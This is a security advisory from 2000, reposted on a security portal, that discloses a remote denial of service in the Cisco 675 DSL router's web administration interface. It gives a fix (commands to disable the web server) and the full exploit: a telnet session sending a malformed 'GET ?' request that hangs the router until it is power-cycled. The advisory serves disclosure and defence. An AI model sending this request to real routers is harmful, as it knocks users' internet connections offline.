[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Cisco 675 Web Administration Denial of Service

Title: Cisco 675 Web Administration Denial of Service
Released by: CDI
Date: 28th November 2000
Printable version: Click here


Title : Cisco 675 Web Administration Denial of Service

Device: Cisco 675 DSL Router

Class : Denial of Service (remote)



Vendor Notified: January 10th, 2000 (Yes folks, 11 months ago)



Patch Available: Nope - see below



                  ---------------------------------



    The Cisco 675 DSL routers with the Web Administration Interface enabled

can be crashed (hard) using a simple GET request. CBOS versions 2.0.x

through 2.2.x have been found to be vulnerable. The new CBOS 2.3.x has not

been tested, but there are no notes in the 2.3.x changelogs to indicate that

they've fixed this problem. Effected 675s were configured in PPP mode. The

'Web Administration Interface' is enabled by default in CBOS revisions 2.0.x

and 2.2.x.



The Cisco 67x series of DSL routers are produced and distributed for

specific telcos to offer to their clients and as such, the installation base

is quite large. (To hazzard a guess, if just 20% of all Qwest DSL users are

using Cisco 675s, the installation base would exceed 25,000) The DSL

adapters in this series include: Cisco 673, Cisco 675, Cisco 675e, Cisco

676, Cisco 677, and Cisco 678. This advisory applies specifically to the 675

but other adapters in this series may have similar problems and should be

tested for vulnerability to this type of attack. I would be interested in

the results if someone has access to and can test the other adapters in this

series. The CBOS codebase is an aquired OS and as such, has no relationship

at all to the main Cisco IOS codebase.



Fix First:

    Disable the Web Based Administration Interface in your 675 until a

    patch or CBOS revision is made available.



  Web Server Disable commands: (2.0.x or better)

    (CBOS 'enable' mode) 

    cbos# set web disabled

    cbos# write

    cbos# reboot



Exploit:

    First find a 675 with the Web Admin server running.



Fingerprint:

    telnet vic.tim.ip.addr 80

    Connected to vic.tim.ip.addr.

    Escape character is '^]'.

    GET / HTTP/1.0

    HTTP/1.0 401 Unauthorized

    Content-type: text/html

    WWW-Authenticate: Basic realm="CISCO_WEB"



    

Unauthorized Access 401

Connection closed by foreign host. Now kill it: telnet vic.tim.ip.addr 80 Trying vic.tim.ip.addr... Connected to vic.tim.ip.addr. Escape character is '^]'. GET ? [LF][LF] (your telnet session dies here, and so does the router) Dead as a post: ping -c5 vic.tim.ip.addr PING vic.tim.ip.addr (vic.tim.ip.addr): 56 data bytes 5 packets transmitted, 0 packets received, 100% packet loss The Cisco never recovers - it's hosed until the router is power-cycled. A simple 'GET ? \n\n' is all it takes to kill the router. In case you're wondering, I had meant to enter 'GET /', but my finger slipped on the shift key. Neat eh? VENDOR RESPONSE: None, and I'll tell you why. (Warning, long rant ahead that has nothing to do with the guts of this advisory.) I first notified 'security-alert@cisco.com' in January of this year. Got an immediate response and all seemed well. Then I didn't hear back from them for a couple of months and promptly forgot all about this. Then in April the 'Cisco IOS Software TELNET Option Handling Vulnerability' (see http://www.securityfocus.com/archive/1/56207) was announced. This vulnerability was very similar to the Cisco 675 problem and I re-contacted Cisco. They claimed they were "still working on replicating the error". Uh, OK, whatever. I placed it on the back-burner and promptly forgot all about it again because I didn't want to announce this vulnerability until a vendor approved fix was available. (The installation base for this adapter is humongous) Then in October of this year some discussion of a potential problem with the Cisco 678 occured on the VULN-DEV mailing list. A Cisco rep on the list had the audacity to complain about prior-notification. (Never mind that VULN-DEV is designed specifically to investigate potential vulnerabilities) Anyway, the issue was again brought before Cisco, they again promised to address this issue. The conversation on VULN-DEV prompted some private correspondence with CORE SDI. The last I heard from Cisco was actually by way of Iván Arce at CORE SDI who wanted more information regarding the Cisco 675 problem while he investigated the CISCO IOS and it's Web Admin bugs. (See CORE-20002510, BugTraq ID 1838) The vulnerabilities are strikingly similar even though IOS is a completely separate codebase from CBOS. Anyway, CORE got word from Cisco PSIRT that they would be addressing this issue by "mid November". Needless to say, this hasn't happened yet. This week's discussion of vendor notification and response times was just gravy. It should also be noted that since January, Cisco has released at least 2 updates to the CBOS 2.x series, without addressing this issue. (no mention of it in their changelogs, although to be fair I've yet to have the opportunity to test this bug against either 2.3.0 or 2.3.5.) CDI ____________________________________ The Web Master's Net http://www.thewebmasters.net/ "Ok spammer, I'll 'just hit delete'. You can be 'Delete'." -- Ron "SuperTroll" Ritzman, NANAE






(C) 1999-2000 All rights reserved.